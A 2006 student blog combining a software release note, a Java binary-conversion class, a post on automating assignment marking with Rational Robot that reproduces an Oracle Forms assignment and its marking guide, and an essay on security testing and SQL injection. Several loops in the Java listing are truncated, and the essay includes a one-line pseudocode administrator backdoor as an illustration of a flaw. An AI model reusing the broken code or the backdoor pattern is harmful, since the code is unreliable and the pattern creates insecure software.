Tuesday, May 30, 2006

My First Release Software

RSS Podcaster

I was taking business link with some marketing group to build Podcaster Software (@ 2006). This is used the newest Technology of RSS and I never heard that before, even they also has very little knowledge about this. Even I have already got 2 Assignment already I before the class is started. They called this Hurdle Assignment. And It only worth 1% But we need to get 100% of this 1% in order to pass the subject.
I may be become a tutor of 2 subjects next semester.

At the first time, I was not confidence to take this. But I have promised to my self for never reject any challenge that God has already given to me. So I have to take this with faith.

When I was looking for IT job, I was expecting the company will teach me everything, and give me everything. But what I got is totally different. I have to do anything my self (Designing, Coding and Testing alone). They just give me a lot of problem that It seems impossible for me to implement it. But this is the rule “Customer is the King”. That‘s why I try my best to do what he wants for this project.

Finally this project is nearly finished and wants to release next Monday. I cannot believe that actually I can build this kind of project alone and faster than what I imagined.
You can Download at


I never image if I didn’t take this challenge before. I won’t get such this great experience my self. Or may be I will get new award soon for building this project alone. Because the other similar project competitor was built by at least 4-5 person that has more experience than me or even professor of IT.

My passion is to become an experienced programmer as soon as possible no matter what is the reason, even I am still studying. That’s why I want to take every challenge and opportunity that God has already given to me. And I will never afraid anymore about the challenge. And I believe, if I have done my best, God will do the rest.

Binary Helper.java

/**
* Class that Support my convertion between binary to number
* @Author : KURNIAWAN Kurniawan
* @STUDENT ID : 2791692
* @Created Date : 13/03/2006
* @Modified Date: 16/03/2006
*
*/
import java.lang.Math.*;
import java.util.*;

public class BinHelp
{

public static int bin2int(int[] biner,int start,int size)
{
int sum=0;
int ctr=start;
for (int i=0;i {
sum+=biner[ctr] * (Math.pow(2,(size-1-i)));
ctr++;
}
return sum;
}

public static int[] int2bin(int dec, int bits)
{

int[] biner= new int[bits];

for (int i=0;i {
biner[i]= 0;
}
int i=0;
if (dec>0)
{
while(dec!=1)
{
biner[bits-1-i]= dec % 2;
dec=(int)dec/2;
i++;
}
//the last one
biner[bits-1-i]= dec;
}

return biner;
}
//this function is to convert binary to byte size
public static byte bin2byte(int[] biner,int start,int size)
{
return int2byte(bin2int(biner,start,size));
}
public static int[] byte2bin(byte dec,int size)
{
return int2bin(byte2int(dec),size);
}
public static int [] join(int [] a, int [] b)
{
int [] ints = new int[a.length + b.length];

System.arraycopy(a, 0, ints, 0, a.length);
System.arraycopy(b, 0, ints, a.length, b.length);

return ints;
}

public static int [] extract(int [] a,int start, int size)
{
int [] result= new int[size];
int ctr=start;
for (int i=0;i {
result[i]=a[ctr];
ctr++;
}
return result;
}


public static int[] createIP(int octet1,int octet2,int octet3,int octet4)
{
int[][] ip= new int [4][8];
ip[0]=int2bin(octet1,8);
ip[1]=int2bin(octet2,8);
ip[2]=int2bin(octet3,8);
ip[3]=int2bin(octet4,8);

int[] result;
result= join(ip[0],ip[1]);
result= join(result,ip[2]);
result= join(result,ip[3]);
//printBin(result,32);
return result;

}

public static void printBin(int[] biner,int size)
{
for (int i=0;i {
System.out.print(biner[i] + " ");
}
System.out.println();
}


public static void displayIP(int[] ip)
{
int[][] ipx= new int [4][8];;
for (int i=0;i<4;i++)
{
ipx[i]=extract(ip,i*8,8);
System.out.print (bin2int(ipx[i],0,8) + " ");

}
System.out.println();
}

public static int byte2int(byte x){return (int)x+128;}//int start 0-255
public static byte int2byte(int x){return (byte)(x-128);}//byte -128 to 128


public static void main(String[] args)
{

System.out.println((byte)129);
}
}

Marking Automation Tester

My Real Project
(Marking Automation Tester) by Kurniawan

I am a Database Management System tutor in Swinburne University this semester.
This week I have a lot of job. I have to marking DMS assignment that I am tutoring.
I got 80 programs (ORACLE FORMS) to test and give them a score.

It was a busy day. So I want to find the way to make automation tester so my work will be easier. But thanks God, I found the way.

I was sitting in Software Testing Process Automation and the lecture (Dr George Plackov) introduced very interesting tools (Rational Robot). My Plan is to create Automation tester to mark 80 Oracle Forms using Rational Robot.

This Automation tester will run the program and check according to the marking sheet and put it the score through the Electronic Submission Processor (ESP)
https://esp.it.swin.edu.au/ .

So basically I just doing 1 click for every form that I get and it will do everything for me. Would it be very interesting?

This is the description of the specification requirement.

GENERAL DESCRIPTION
The aim of this assignment is to implement:
A. A stored procedure that performs a bank transaction on the Minibank database.
B. A Form that can be used by the teller to perform a bank transaction over-the-counter bank transaction.

The Minibank Schema MBDDL.SQL with sample data MBDAT.SQL are supplied
MBCUSTOMER(cust_no, surname, name1, name2, address1, address2, state, postcode, birthdate)
MBACCOUNT(account_no, cust_no, account_type, int_rate , last_stmnt_date, balance, overdraft, holdflag)
MBTRAN(trans_no, trans_type, trans_amount, account_no, balance, trans_text, trans_date_time, trans_user)
TRANSNUMB_CONTROL(last_transnumb)
The table TRANSNUMB_CONTROL is used to a generate unique key values for the MBTRANS table. TRANSNUMB_CONTROL should hold the next key value for a row to be inserted into MBTRANS, and then incremented ready for the transaction.



DETAILED SPECIFICATION
A. The stored procedure performs a bank transaction in accordance with the following business rules:
BR1. When a (Bank) transaction is performed on a customer’s account (eg. deposit or withdrawal transaction), a record is entered into the transaction log (MBTRANS) identified by a unique transaction number. The current time, date, teller identity as well as the account number, the new account balance and type of transaction are recorded.
BR2. A deposit (trans_type = ‘DEP’) credits the account balance by the transaction amount.
BR3. A withdrawal (trans_type = ‘WITH’) debits the account balance by the transaction amount.
BR4. If a withdrawal would take the balance below the credit limit (balance + overdraft < 0 ), the withdrawal is rejected.
BR5. No withdrawals are allowed on held accounts.
BR6. For any over-the-counter withdrawal (trans_text = ‘Over-the-counter’ AND trans_type = ‘WITH’), a bank charge of $3 is automatically levied on the account. The charge is debited from the account balance and logged separately as a transaction of type CHGS (trans_type = ‘CHGS’).
BR7. For any deposit or withdrawal (trans_type IN (‘WITH’,‘DEP’)) on a cheque account (account_type = ‘CHQ’), the government levies a tax at the rate of 0.1% of the deposit or withdrawal amount. The tax is debited from the account balance and logged separately as a transaction of type FID (trans_type = ‘FID’).

The stored procedure has the following specification:
CREATE OR REPLACE addTrans(
new_trans_type MBTRANS.trans_type%TYPE,
new_trans_amount MBTRANS.trans_amount%TYPE,
new_account_no MBTRANS.account_no%TYPE,
new_trans_text MBTRANS.trans_text%TYPE,
new_trans_user MBTRANS.trans_user%TYPE)
The procedure should raise the following errors:
raise_application_error(-20001, ‘Account not found’);
raise_application_error(-20002, ‘Insufficient funds’);
raise_application_error(-20003, ‘Account held: No withdrawal allowed’);




Testing stored procedure
The stored procedure should be tested for the following scenarios:
Scenario Expected Outcome
Normal Deposit Deposit transaction logged.
Account balance incremented by transaction amount.
Tax transaction logged.
Over-the-counter Withdrawal Withdrawal transaction logged.
Account balance decremented by transaction amount.
Tax transaction logged.
Charges transaction logged.
Other Withdrawal Withdrawal transaction logged.
Account balance decremented by transaction amount.
Tax transaction logged.
Non-existent account ERROR ‘Account not found’
Insufficient funds ERROR ‘Insufficient funds’
Account held ERROR ‘Account held’



B. Develop an Oracle form to be used by a teller at Minibank to perform over-the-counter bank transactions. The teller accepts applications from customers at the counter for deposits or withdrawals from any of the customer’s accounts except withdrawals from a cheque account. Cheque clearances are handled separately. The behaviour of the form during the user interaction phase is as follows:
1. When the user teller loads the form, the current date and identity of the teller is displayed.
2. The teller enters an account number either directly or by selecting a value from an LOV (pop up list) showing account_no, account_type and surname in surname sequence.
3. Upon entering a valid account number, the customer’s surname (surname) and first given name (name1), account type and available credit (credit) are displayed. Available credit is calculated as balance+overdraft. The user cannot directly modify the displayed values of surname, name1, account_type or credit on the form.
4. Only a single over-the-counter deposit or withdrawal transaction can be entered by this form; that is, purchase, interest, bank charge or tax transactions cannot be entered directly by this form. The user then enters either ‘DEP’ or ‘WITH’ for trans_type, except if the account type is ‘CHQ’, or the account is held, then trans_type displays ‘DEP’ and can only accept ‘DEP’.
5. The user then enters a positive value for the transaction amount (trans_amount). A deposit (DEP) increments the displayed available_credit by trans_amount. A withdrawal decrements the credit by trans_amount, as long as credit does not go below zero in which case the transaction amount is rejected. (See business rule 4 above.)
6. (OPTIONAL) If the user goes back and modifies trans_type, if trans_amount is not null, credit is recalculated and displayed.
7. If the user does not enter a value for trans_text, it defaults to ‘Over-the-counter’.
8. (OPTIONAL) If the user goes back and modifies account_no, then surname, name1, account_type and credit are re-evaluated and trans_type and trans_amount are set to null.
9. The form should also enforce all fixed-format database constraints that apply to data in the form.
10. The form cannot be used to directly query, update or delete of any row in the database.

The appearance of the form should be

When the user presses SAVE, the form should commit a transaction on the Minibank database according to business rules BR1-7 above. These business rules must be preserved during the Post-and-commit Phase. Even though business rules 4 & 5, would have been validated during the user interaction phase, it is possible that it may have been invalidated by other concurrent transactions. Such violations must be caught by your form and reported appropriately on the message line. This will be tested.
You should produce two different versions of the form, each with a different design for the post-and commit logic.
B1 This version should call the stored procedure from part A from the ON-INSERT trigger. Thus all business logic is implemented on the server. All exceptions raised by the stored procedure will be handled in the EXCEPTION section of the ON-INSERT trigger. (An example of this kind of architecture can be found as VERSION 3 in Lecture 5.) A skeleton for the ON-INSERT trigger is provided below.
B2 This version should implement all business logic in the PRE-INSERT trigger on the client. All exceptions will therefore be handled in the EXCEPTION section of this trigger. (An example of this kind of architecture can be found as VERSION 1 in Lecture 5.)
Only Oracle Form Builder features described in lectures may be used to develop this form.
Your form must behave correctly even when there are several transactions running concurrently. That is, transactions independently accepting valid changes during user interaction may fail after attempting to commit the changes. Hence you will need to lock records to prevent two or more users accessing the same record at the same time. It is therefore important for you to decide what SELECT statements should lock their result.
Your form must be portable. That is, it should run correctly from any Oracle account that has access to the MB database. To ensure this, you should run and test your form in a different account from what it was developed.
Development Steps
1. Analyse Business rules. Determine whether each one is a verifier or an evaluator.
2. For the database transaction, determine what business rules need to be preserved by the transaction.
3. Determined what tables are primarily INSERTed into by the transaction. Make datablocks based on these tables for the form.
4. Based on the requirements of part B, carry out a design of your form for the user interaction phase. Use the notation for form objects and triggers from the lecture.
5. For each INSERT operation, draw a block diagram showing a PL/SQL program block with inner blocks that preserve verifiers and evaluators.
6. Code and test stored procedures.
7. Use the PL/SQL block design to design the behaviour of your form during the Post-and-Commit phase. Use the notation for triggers, procedures and tables from the lecture. Draw separate diagrams for each of Architecture B1 and Architecture B2.
8. Code and test.
Forms Advice
a. Make sure when compiling a form that you are connected to the DBMS. If not, errors will be generated even though the syntax and logic may be correct.
b. The order in which the cursor jumps from field to field is determined by the order in which those blocks and fields are listed in the object navigator. Oracle starts at the top and works its way down. To change the jumping order just change the order in the object navigator by selecting and dragging the fields to the appropriate position relative to the others. Also applies to blocks.
c. When creating a text-item manually in Navigator, the item will not be visible on the form unless it is place on the canvas. Assign it to the canvas in the Property Palette. To change the properties of the item, double click on the item to get the Property Palette.
d. When creating a text item that does not correspond to a column in the current table, don’t forget to change the property Database item to NO in the Property Palette.
e. So that a user cannot change the value of an item, you can set the item properties so that it is a Display Item.
f. To disallow querying, deleting or updating of records, go into the properties of the block in the section Database and set to NO the properties “query allowed” , “update allowed” and “delete allowed”.
g. To run a Form, don’t forget to start OC4J instance.








MARKING GUIDE
MB Teller Form
This marking scheme assumes a datablock based on the MBTRAN table. Designs based on other tables are possible, but complex. Any student presenting with an alternative design must pass the same behavioural tests. The functionality should be the same, but the triggers may be different. You need to look at any like this separately, but be tough.
Populate the database by running MBANKDAT2.sql from the SQL*Plus window.
Carry out inspection only if test is inconclusive.
Feature Test Inspection Mark
1. Form showing correct fields. Load the form MBTellerBa.FMB and observe. 1
2. Current date (non-input) displayed. Observe WHEN-CREATE-RECORD, PRE-FORM, -BLOCK or –RECORD 1
3. Current user (non-input) displayed. Observe 1
4. No query allowed. Attempt Enter Query. Property Palette. 1
5. account_no input, NOT NULL and validated, and LOV for held account. Attempt to leave field NULL.
Enter wrong account_no, manually.
Attempt to enter valid account_no by LOV. LOV 2
6. Customer name, Credit Account type (all non-input) populated. Enter account_no = 410100
Check Customer are populated.
POST-TEXT-ITEM or POST-CHANGE or WHEN-VALIDATE-ITEM on :account_no. 2
7. Customer name, Credit Account type cannot be updated. Attempt to update any of:surname, :name1, :credit, :account_type fields. Propery Palette 1
8. Trans_type input, NOT NULL and valid. Attempt to leave field NULL.
Enter wrong :trans_type.
Enter valid :trans_type = ‘WITH’. POST-TEXT-ITEM or POST-CHANGE or WHEN-VALIDATE-ITEM on :trans_type. 1
9. Withdrawal should give error. Should display message ‘Cannot withdraw from held account.’ OR WHEN-VALIDATE-RECORD 1
NEW FORM
10. Enter Trans_amount invalid for withdrawal. Should show appropriate error message. Enter account_no = 402000
Enter valid :trans_type = ‘WITH’.
Enter invalid :trans_amount = 5000.
Should display message ‘Insufficient funds.’ POST-TEXT-ITEM or POST-CHANGE or WHEN-VALIDATE-ITEM on :trans_amount and :trans_type. 1
11. Enter valid withdrawal Trans_amount. Credit (non-input) updated. Enter valid :trans_amount = 2000.
:credit = 2003 2
12. Comment (input) initialized and. :trans_text = ‘Over-the-counter’
Attempt to change ok. 1
END OF USER INTERACTION testing
13. Enter valid withdrawal, but before SAVE, another transaction reduces credit limit. Should produce appropriate error message. Enter account_no = 402000
Enter valid :trans_type = ‘WITH’
Enter valid :trans_amount = 2000.
DO NOT PRESS SAVE
In SQL*Plus window, reduce the credit available to account 402000, by running 2.sql script. Should succeed, if not, then lock in form taken too soon. Return to the form window and SAVE. Should fail with user-defined error message of insufficient credit. PRE-INSERT on :MBTRAN trigger for credit check. Re-read account balance with lock. Original credit must be reassigned based on new query.
PRE-INSERT on :MBTRAN 4
14. Enter valid withdrawal, but before SAVE, another transaction puts hold on the account. Should produce appropriate error message. Enter valid :trans_amount = 5.
DO NOT PRESS SAVE
In SQL*Plus window, put a hold on account 402000, by running 3.sql script. Should succeed, if not, then lock in form taken too soon. Return to the form window and SAVE. Should fail with user-defined error message of account on hold. 3
15. Successful cheque deposit:Trans number correctly assigned Enter account_no = 402100
Enter valid :trans_type = ‘DEP’
Enter valid :trans_amount = 200.
PRESS SAVE, Run 4.sql in SQL*Plus window:
TRANS_NO TRAN TRANS_AMOUNT ACCOUNT_NO BALANCE TRANS_TEXT
---------- ---- ------------ ---------- ---------- ----------------
5002 FID .2 402100 2806.6 Cheque Deposit
5000 DEP 200 402100 2806.8 Over-the-counter PRE-INSERT on :MBTRAN.
Transaction number generated
Date re-evaluated
Re-read balance & check credit
No hold check

PRE-INSERT or POST-INSERT on :MBTRAN.
Govt tax INSERT
Bank charge INSERT
If PRE-INSERT, database items should not be modified. 1
16. Transaction logged 1
17. Govt tax. 1
18. Account balance updated 1
19. Successful savings withdrawal:Trans number correctly assigned. New form
Enter account_no = 410011
Enter valid :trans_type = ‘WITH’
Enter valid :trans_amount = 100.
PRESS SAVE, Run 5.sql in SQL*Plus window:
TRANS_NO TRAN TRANS_AMOUNT ACCOUNT_NO BALANCE TRANS_TEXT
-------- ---- ------------ ---------- ---------- ----------------
5003 WITH 100 410011 12496.9 Over-the-counter
5004 CHGS 3 410011 12493.9 OtC Fee 1
20. Transaction logged 1
21. Bank charge 1
22. Account balance updated 1
23. No queries in user-interaction triggers should be locked Deduct marks if SQL*Plus transactions hang. user-interaction triggers 4
CODE INSPECTION
24. All queries in transactional triggers must be locked. PRE-INSERT trigger 2
25. Separate user-defined error messages. Separate error message texts for insufficient funds, held account, account not found. Look in POST-CHANGE etc on :trans_type & :trans_amount, PRE-INSERT & ON-ERROR. Should not combine error messages.. 2
26. Trigger coding style Naming, indentation, program blocks, data declarations as local as possible. 2
27. Error message text Appropriate error message text. 3
28. Validation Trigger level (during user interaction) A constraint should be tested as early as possible, ie. the trigger timing should not be too late or level too high. A constraint should not be tested any more frequently than is necessary, ie. the trigger level should not be too low. Triggers should be used consistently, viz POST-TEXT-ITEM or POST-CHANGE or WHEN-VALIDATE-ITEM. 2
29. No redundant, nonfunctioning objects Such as blocks, items or triggers 3
30. No duplicate querying of the same row in user interaction phase. 3
31. Logic for separate business rules in separate subblocks. Except where functionality is common 2
32. No duplicate functionality in post-and commit phase. Repeating code to generate trans number 2
33. All error messages confined to EXCEPTION section of PRE-INSERRT trigger Use EXCEPTION variables 2
34. No programmed INSERT of primary bank transaction in PRE-INSERT trigger 3
35. Quality of Comments Comments should use business language unless programming is unusually complex. All program blocks shoud be traceable to business rules by comments. 2
36. Quality of names Names in form should be consisyent with the DB. Other names should be meaningful in terms of the business. 2
RESTORE the DB (Run MBANKDAT2.sql) - CALLING Stored procedure 0
37. Form commits db transaction correctly with stored procedure. Run the form MBTellerBb.FMB with any successful transaction. No errors. 5
38. Calling stored procedure from ON-INSERT trigger Parameters should be correct 3
39. EXCEPTION section of ON-INSERT trigger 3
TOTAL 75


ESP MARKING SHEET should be automatically filled with Rational Robots




After it finished fill up my marking sheet, I can check up manually before I submitted the score by comparing the result with the reports from rational robots.
STEPS THAT I HAVE DONE


STEPS 1. Preparing all of the stuff that needs to be test and run automatically
There are 3 applications that should be run automatically together:

1. Form Application that I want to test






2. SQL PLUS, To test Locking and deadlock.


3. and ESP system to input the marking



STEPS 2. Open the rational Robot and Start Doing Capturing GUI

Select from ESP system which assignment need to be checked.

Download the assignment


Save the file to the C:/temp


Open The form and look at the code


Start Testing and Capture the Result


Update the Marking Sheet based on the testing



STEPS 3. Changing the Scripts so it can be looping automatically through all buttons

By using some basic iteration algorithm, I can generate very powerful tool
This is the code that has been generated



I can generate test data by using Data pools
Open Test Manager (from a Rational Robot script follow Tools > Rational
Test > Test Manager)


Open a datapool (Tools > Manage > Datapools)


I can generate 2000 Test Data to test the performance of the oracle


After that I change my Scripts so It can generate The SQL (Script Query Language that can be inputted directly to iSQL Plus


'$Include "SQAUTIL.SBH"

Sub Main
Dim Result As Integer
dim i as integer
dim givenName as string
dim surname as string
dim address as string
dim phone as string
dim mobile as string

dp= SQAdatapoolOpen("Customer")


'Initially Recorded: 29/04/2006 9:56:01 PM
'Script Name: test sql

Window SetContext, "Caption=iSQL*Plus Release 9.2.0.6.0 Production: Work Screen - Mozilla Firefox", ""


for i=1 to 200

call SQADatapoolFetch(dp)
call SQADatapoolValue(dp,1,givenName)
call SQADatapoolValue(dp,2,surname)
call SQADatapoolValue(dp,3,address)
call SQADatapoolValue(dp,4,phone)
call SQADatapoolValue(dp,5,mobile)

InputKeys "insert into customer values ('" & givenName & “…….. "{ENTER}"

GenericObject Click, "Class=MozillaWindowClass;ClassIndex=7", "Coords=37,392"
next i
call SQADAtapoolClose(DP)
End Sub



AND it will generate




After that I just compare the result that generated by Rational Robot which I done manually.

After I confident if my Automation Tester will work properly, I leave it alone until 4 hours testing.

And finally this subject really helps me a lot, to finish my job and busy day.
I can image how to work without this tool.
Thanks to my beloved teacher (Dr George Plackov)








THE LACKNESS OF RATIONAL ROBOT

• Rational Robot consumes a lot of Memory and CPU process!
I test my application using Rational Robot at Swinburne Burwood LAB ( SB103 ) That have 256 DDR 400 RAM, Pentium 4 1.8 GHZ. And It takes around 6 hours to capture my testing process. It will be easy to capture with small application in Lab material (using Access) but when I try using ORACLE and FORM, SQL PLUS, FIREFOX as browser, it takes very long to capture. I have to wait 5-10 minutes to capture 1 functional test. It is very slow!!!

• Rational Robot not release unused memory
It holds the memory every time it finished. As a result I have to restart my computer for each capturing functional test. Otherwise my computer will be hangs

• Rational Robot contains some bugs
I found some bugs. Some functional can not be capture especially when I want to capture LOV (List of Value) in Oracle form. It always hangs; even I try to restart many times.

• Rational Robot don’t have recovery state
It doesn’t have recovery state. If my computer hangs when I am doing capture, and I have to restart my windows, my capture test is GONE!

• Rational Robot consumes a lot of Hard disk capacity
For 1 capture functional test, it consumes 20-30 MB. Image if you have 1000 functional test, how much HD capacity, you need to supply for this Rational Robot.

Finally because of those lack nesses, it takes more than 10 hours just for generating Automation Marker. Hopefully it will be shorter time, if I have more memory and CPU.

Software Testing VS SQL INJECTION

Abstract

Software application security is more than configuring a firewall or using long passwords with numbers in them. Software applications are made up of software modules or components and in the context of the Internet, these modules are highly visible. There are many opportunities for the hacker.

All students of Information Technology (IT) who write programs have it drummed into them to compartmentalise code into modules. Compartmentalisation is a core foundation of Object Oriented philosophy and arguable good programming practice for any software design paradigm. With large to mid size projects, software developers use concepts of code re-use and code off-the-shelf so software modules may not necessarily have been written by the developers of the whole application. “Building secure software is very different from learning how to securely configure a firewall. It must be baked into the software, and not painted on afterwards” [Curphey 04]. Module level security is at the heart of application security. What security risks lie in wait within these modules and how to test for them? This document discusses the role of software testing in a security oriented software development process.

Software security is not a black and white field. Business Owners want to pay for a simple silver security bullet, by following security guidelines or framework – “do it this way or follow this check list, and you’ll be safe.” The black and white mindset is invariably wrong. Other security testing concepts, Penetration Testing and Black Box Testing only reveal security issues for those that have been tested for. Other techniques, Code Inspection and White Box Testing, take time and money. At a technical level, security test activities are carried out to validate that the system conforms to the security requirements thereby identify potential security vulnerabilities. At a business level , these tests are conducted to protect reputation, brand, reduce litigation expenses, or conform to regulatory requirements.

Absolute security is a myth. Approaching this myth is limited by the Business Owner requirements. The Business Owner ultimately defines security by weighing up cost and time versus risk. A very secure and safe, billion dollar application, five years too late, is worthless.

The solution is multifaceted and wide: from a top level review of the Software Development Life Cycle (SDLC) process itself; to a low level re-examination of coding philosophies and algorithms.




Introduction

Over the decades, our requirement to secure software has elevated with the evolution of software business systems that were accessible by a manageable handful of insiders to today’s web based forms, accessible by the millions of people.

Along the way, our forty year initiation into the discipline of Information Technology (IT) has introduced new security challenges. In the early days, perhaps, the top-down trust of business owners in its IT workers was a fair gamble and software security may have been a minor or non existing paragraph in the documents of those early software specifications. Modern business owners however, demand security. Every user is a potential threat.

Albeit, security does have long history in IT; going back to the origins of peer to peer networks of the 1960s. But, as a discipline, the study of computer security wasn’t forged until the early 1970s and was largely focused around log files [Anderson 72]. With the advent of greater reliance on and emergence of IT and the Internet, the necessity for security has grown. The monitoring of log files is no longer enough. IT in the early 1990s mainly used LANs for the medium to small businesses. For large businesses it was WANs and the internet. Organisation risk management (in the 1990s) mainly included tape backups of the data, large institutions such as banks could afford backup mainframes such as the IBM 3090.

IT has evolved and become more complex, and there are other alternatives available to organisations today. There is disaster recovery setups, clustering of servers and networks, greater bandwidths to have backups mirrored to off site systems; are just to name a few. While more software solution packages have entered the market this does not mean that organisations changed their methodology greatly on IT Risk management . Information and systems security is critical to organizational survival. The Melissa virus and I love You virus were released into to wild 1999 and 2000 respectively as well as the Chernobyl virus causing tens of millions of dollars damage to business well before the 2001 terror attacks on the US. [Zammit 04].


Security vulnerabilities are a type of software bug. It is commonly accepted that software bugs exposed earlier in the development process are much cheaper to fix than those discovered late in the process. Arguably, security vulnerabilities have a greater financial impact on the Business Owner than traditional software bugs. Security bugs can cause damage to reputation, brand, goodwill and result in liability and legal issues.
















(Fig 1)

The benefits linked with traditional testing philosophies are also realized throughout the software development life cycle with security testing. IT security is its own field and is here to stay [Goasduff 04] and is likely to continue evolving, Example: The Secure Socket Layer (SSL) protocol is a leading on-line technologies development with a blend of Extensible Markup Language (XML) which make almost a standard encryption and security system for critical information sharing. This technology protects the data or information integrity while in transit, however the environment to which it is going to, or is coming from may not be secure [Orgall 04].

The solution to software security will never be absolute. No cure can be found for a disease unknown. “A security test is simply a point in time view ...a defensive posture and (the security testers ) present the output from their tests as a security snapshot. They call it a snapshot because at that time the known vulnerabilities, the known weaknesses. Is this snapshot. enough?” [osstmm1]

Levels of Security

Level One Security – Securing the Network. Hardware/software hybrid solutions have been invented to secure systems: Routers, firewalls, proxy servers, policing the network, applying the Business security rules about ports, protocols, addresses using abstractions of virtual networks, intranet versus internet, trusted sites and the like.

Level Two Security – Securing the Host. Software applications are hosted on servers. One host may host multiple Business systems. Operating system authentication methodologies are used to police who gets in to the host and what access rights the user has. Concepts of superuser, administrator, user, groups and roles have been created with varying access privileges to operating system and hosted software entities.

Level Three Security – Securing the Application. Since the host may host multiple applications, the host based user rights normally don’t map to application user rights so that business system software also have a security regime. Example: a database application such as Oracle has another layer of system and user entities similar to the host based users. And, even though the user running the application has unrestricted access to the local file system, code permissions may restrict an application to read only access and only within a specific directory.

Level Four Security – Module security. Software applications are made up of software modules. The sum of the modules is the whole application. Modern software development includes concepts of code re-use, code off the shelf, not necessarily built by the developers of the whole. Often it is the smallest details that lead to the biggest security threats. The accumulation of the small stuff, which individually may not represent much risk although when aggregated, may lead to a security breach. Many organizations utilize the processing capabilities of third party partners, who more than likely have differing security policies than them.







(Fig 2)






Software security is not keeping pace as advances are made. Despite new technical standards, the application security problem is getting worse. According to research by the National Institute of Standards (NIST), 92% of all security vulnerabilities are now considered application vulnerabilities and not network vulnerabilities.

















(Fig 3)

Module security

A module comprises of one or more components to achieve a business function [applabs1]. It encapsulates and aggregates the functionality of its components and appears as a blackbox to its users. We must consider a security code review of applications. Security code inspections take one step further by attempting to look for design and architectural flaws as well as language-specific implementation bugs. Testing has shown that the current crop of Web application scanners find fewer than 20% of the vulnerabilities in a common Web site. That leaves about 80% in production code for the hackers to find and exploit [Curphey 04] [Curphey 06].

Module security is at the heart of application security. A Web page in any incarnation is essentially a software module. And web pages are the most visible interface of any Internet hosted application. Even a non-programmer using their Internet browser to view source may be able to detect that a flaw exists.


if input from browser = “the special 40 characters” then log user in as administrator


Security Testing

We can use of a variety of testing techniques specifically to probe security. There are two major aspects of security testing: Functional Testing which tests that it works (or indeed that it doesn’t work) and Risk Based Testing which tests the subsystem in light of malicious attack. Security testing is motivated by probing undocumented assumptions and areas of particular complexity to determine how a program can be broken [Howard 02].

Functional Testing

Functional Testing is a broad topic that the literature on traditional software testing covers in great detail. With the emphases on software security, functional testing plays an important role. However, functional testing should not provide a false sense of security. Testing cannot demonstrate the absence of problems in software, it can only demonstrate (sometimes) that problems do exist [Dijkstra 76]. Testers can try out only a limited number of test cases, and the software might work correctly for those cases and fail for other cases. Security-related bugs differ from traditional bugs. Users do not normally try to intelligently search out software bugs. An enterprising user may occasionally derive satisfaction from making software break, but if he or she succeeds it affects only that user. On the other hand, malicious attackers do intelligently search for vulnerabilities. If they succeed, they cause problems for other users, who may be adversely affected. Compounding the problem, malicious hackers are known to script successful attacks and distribute them [Michael 05].

Risk Based Testing

Whether Risk Based Testing should be regarded as a subset of Functional Testing is largely a matter of opinion, but due to its significant role in secure software development it is discussed separately here.

Threat Risk Modelling is the most important mitigation development in web application security in the last three years [Curphey 04]. Risk-based testing is based on software risks. For example: in many web-based applications, there is a risk of injection attacks, where an attacker fools the server into displaying results of arbitrary SQL queries. A risk-based test might actually try to carry out an injection attack, or at least provide evidence that such an attack is possible. For a more complex example, consider the case where risk analysis determines that there are ambiguous requirements. In this case, testers must determine how the ambiguous requirements might manifest themselves as vulnerabilities. The actual tests are then aimed at probing those vulnerabilities [Michael 05].

Testability

Security testing is often fundamentally different from traditional testing because it emphasizes what an application should not do rather than what it should do. [Fink 97] There is a far greater emphasis on negative requirements in security testing. Example: ”user should not be able to modify the contents of the web page” or ”unauthorized users should not be able to access data.” This shift in emphasis from positive to negative requirements affects the way testing is performed. To apply the standard testing approach to negative requirements, one would need to create every possible set of conditions, which is impossible. Many security requirements, such as ”an attacker should never be able to take control of the application,” would be regarded as un-testable and testers would ask the requirements be refined or dropped. But many security requirements can be neither refined nor dropped even if they are un-testable. For example, one cannot reliably enumerate the ways in which an attacker might get control of a software system but cannot drop the requirement. [Michael 05]

Major Trends

A) Threat Risk Modelling

Threat Risk Modelling is an important tool used to identify highly privileged operations that can then be extremely well reviewed for security flaws to ensure they cannot be compromised. Threat modelling is a valuable technique that can be applied to software both during the development process and after software has been built. Microsoft’s Threat Risk Modelling methodology is pragmatic approach to risk analysis. The idea is to explore the application while thinking like a hacker. This forces testers to explore weaknesses in the architecture and determine if adequate countermeasures are in place. The testers describe the system and create a list of the assets that make up the entire system. These assets are determined whether they are architecturally significant from a security perspective. That is, does the asset play a role in enforcing the security model? If it does, it is highly likely that you will want to perform a security code inspection on it. Another part of the process is to define trust boundaries. These boundaries separate components implicitly trust each other. By describing these trust boundaries the tester can discover the path of least resistance an attacker may travel. Then develop a list of realistic threats to the system. It quickly becomes obvious if the system could be compromised by certain common threats. Each threat is then categorized and ranked. Microsoft has developed several schemes for this ranking, STRIDE and DREAD. (Business Owners usually develop their own ranking models). STRIDE is a classification scheme standing for Spoofing, Tampering, Repudiation, Information disclosure, Denial of service and Elevation of Privileges. DREAD is a ranking model and an acronym for Damage potential, Reproducibility, Exploitability, Affected users and Discoverability. For each threat testers decide if there are adequate countermeasures in place to prevent the attack. Any threat without a countermeasure is by definition a vulnerability.

B) Code Inspection

Code inspection is a part of the code review process. Take the security significant parts of the system and find both flaws and bugs in the code. Flaws are issues in the code due to poor implementation choices whereas bugs are issues in code usually due to incorrect semantic constructs such as buffer overflows. Code inspection involves reviewing source code and looking for common security problems in a systematic manner. But most real-world applications consist of hundreds of thousands of lines of code. Reviewing every line takes an unpractical amount of time. This is where threat modelling can help. Armed with a list of prioritized assets and threats from a threat-modelling exercise, testers locate and focus on that actual source code.

Security code inspection can be automated to some extent. A number of free and commercial tools are available to help in this regard by automated code inspection for a number of common security vulnerabilities. These tools can primarily be classified into static or dynamic analysis tools. The static tools essentially scan the code for unsafe functions and other language constructs. These typically are far more effective with unmanaged languages such as C and C++ where the list of unsafe functions is well documented. Dynamic analysis tool makers claim that their tools compile the source and determine call graphs and dataflow patterns to provide better results than static analysis.

These tools however have limited effectiveness. They find low level faults quickly but , they are not good at finding complex authorization flaws. They are lacking in dealing with managed languages such as Java and C#, which take issues such as buffer overflows out of the equation. Code inspectors don’t take into account exploitability. It’s impossible to have one suite fits all and experienced development teams are able to write scripts to automate the scanning for unsafe functions that would be unique to a particular application. Manual code review reveals more significant and exploitable issues.

C) Risk Management Standards/ Methodologies

A number of standards or frameworks are available to determine and manage risk. Some of these standards may be mandatory depending on the country or nature of the Business. By using threat risk modelling the result is implementing systems that reduce business risk. These standards are relatively cheap and effective. The methodologies focus on testing against negative requirements or, in other words, on probing security-related risks.

